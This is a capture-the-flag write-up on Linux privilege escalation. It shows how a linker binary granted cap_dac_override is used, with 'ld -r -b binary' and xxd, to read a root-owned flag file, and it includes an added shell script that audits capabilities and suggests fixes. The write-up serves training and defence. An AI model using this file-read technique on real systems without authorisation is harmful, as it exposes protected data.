SINCON Wonderland CTF — Privilege Escalation (Points: 200)

happybear
1 min read · Jan 6, 2021

One of the files on the machine was granted a capability in the permitted capability set.

Objective: By leveraging the capability provided to the file, escalate to root and retrieve the flag!

Use getcap to find out which programs have “special” capabilities. Programs with CAP_DAC_OVERRIDE can bypass file read, write, and execute permission checks, so any such binary that an unprivileged user can run is effectively a path to root-owned files.

student@localhost:~$ getcap -r / 2>/dev/null
/usr/bin/x86_64-linux-gnu-ld.bfd = cap_dac_override+ep
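The same getcap enumeration works just as well from the defender's side. The script below is an added example, not part of the original writeup: it parses `getcap -r / 2>/dev/null` output, flags capabilities that bypass DAC or are root-equivalent, and prints (without running) the `setcap -r` commands that would strip them. The sample input is constructed, the list of risky capabilities is my own shortlist rather than an official one, and the handling of the newer `path cap=flags` output format is an assumption about recent libcap versions.

```shell
#!/bin/sh
# Audit file capabilities from `getcap -r / 2>/dev/null` output and flag the
# ones that let an otherwise unprivileged user bypass DAC or reach root.
# Added example; not from the original post.

# Constructed sample of getcap output (assumption: mixes the "path = caps+flags"
# form shown in the post with a multi-capability clause; not captured from a real box).
SAMPLE_GETCAP='/usr/bin/x86_64-linux-gnu-ld.bfd = cap_dac_override+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/local/bin/backup = cap_chown,cap_dac_read_search+p'

# Capabilities that are root-equivalent or bypass file permission checks
# (assumption: the editor's shortlist, not an exhaustive or official one).
RISKY_CAPS='cap_dac_override cap_dac_read_search cap_setuid cap_setgid cap_chown cap_fowner cap_sys_admin cap_sys_ptrace cap_sys_module'

# audit_caps: read getcap lines on stdin, print "path capability flags" for each
# risky capability found. A capability that is only permitted (+p), not effective,
# still counts: a capability-aware binary can raise it into its effective set.
audit_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        # Older libcap prints "path = caps"; newer prints "path caps". Handle both.
        case "$line" in
            *' = '*) path=${line%% = *}; caps=${line#* = } ;;
            *)       path=${line%% *};   caps=${line#* }   ;;
        esac
        # A clause looks like "cap_a,cap_b+ep" (old) or "cap_a,cap_b=ep" (new).
        for clause in $caps; do
            names=${clause%%[+=]*}
            flags=${clause#*[+=]}
            old_ifs=$IFS; IFS=,
            for cap in $names; do
                case " $RISKY_CAPS " in
                    *" $cap "*) printf '%s %s %s\n' "$path" "$cap" "$flags" ;;
                esac
            done
            IFS=$old_ifs
        done
    done
}

# fix_commands: turn audit output into the setcap invocations that strip the
# capability (printed, not executed, so an operator can review them first).
fix_commands() {
    while read -r path cap flags; do
        printf 'setcap -r %s\n' "$path"
    done | sort -u
}

# Demo run over the constructed sample.
printf '%s\n' "$SAMPLE_GETCAP" | audit_caps
printf '%s\n' "$SAMPLE_GETCAP" | audit_caps | fix_commands
```

On a real host, feed it with `getcap -r / 2>/dev/null | audit_caps`. The ping entry is deliberately left alone: cap_net_raw is the normal, expected way to avoid a setuid ping, whereas cap_dac_override on a general-purpose tool like the linker is exactly the configuration the challenge exploits.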

Trying my luck to find out where the flag is stored.

student@localhost:~$ /usr/bin/x86_64-linux-gnu-ld.bfd /tmp/flag
/usr/bin/x86_64-linux-gnu-ld.bfd: cannot find /tmp/flag: No such file or directory
student@localhost:~$ /usr/bin/x86_64-linux-gnu-ld.bfd /root/flag
/usr/bin/x86_64-linux-gnu-ld.bfd:/root/flag: file format not recognized; treating as linker script
/usr/bin/x86_64-linux-gnu-ld.bfd:/root/flag:1: syntax error

How can the linker be used to read arbitrary files? Link them into a binary: with `-b binary`, ld treats the input as raw data and copies its contents verbatim into the output object.

student@localhost:~$ /usr/bin/x86_64-linux-gnu-ld.bfd -r -b binary /root/flag -o flag.o

Then use xxd to dump the built object; the flag's bytes appear in it unchanged.

student@localhost:~$ xxd flag.o
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............
00000010: 0100 3e00 0100 0000 0000 0000 0000 0000 ..>.............
00000020: 0000 0000 0000 0000 5001 0000 0000 0000 ........P.......
00000030: 0000 0000 4000 0000 0000 4000 0500 0400 ....@.....@.....
00000040: 3064 6233 3161 6562 3033 3936 6364 3839 0db31aeb0396cd89
00000050: 3664 6638 3732 6333 6132 3337 3039 3661 6df872c3a237096a
00000060: 0a00 0000 0000 0000 0000 0000 0000 0000 ................
...
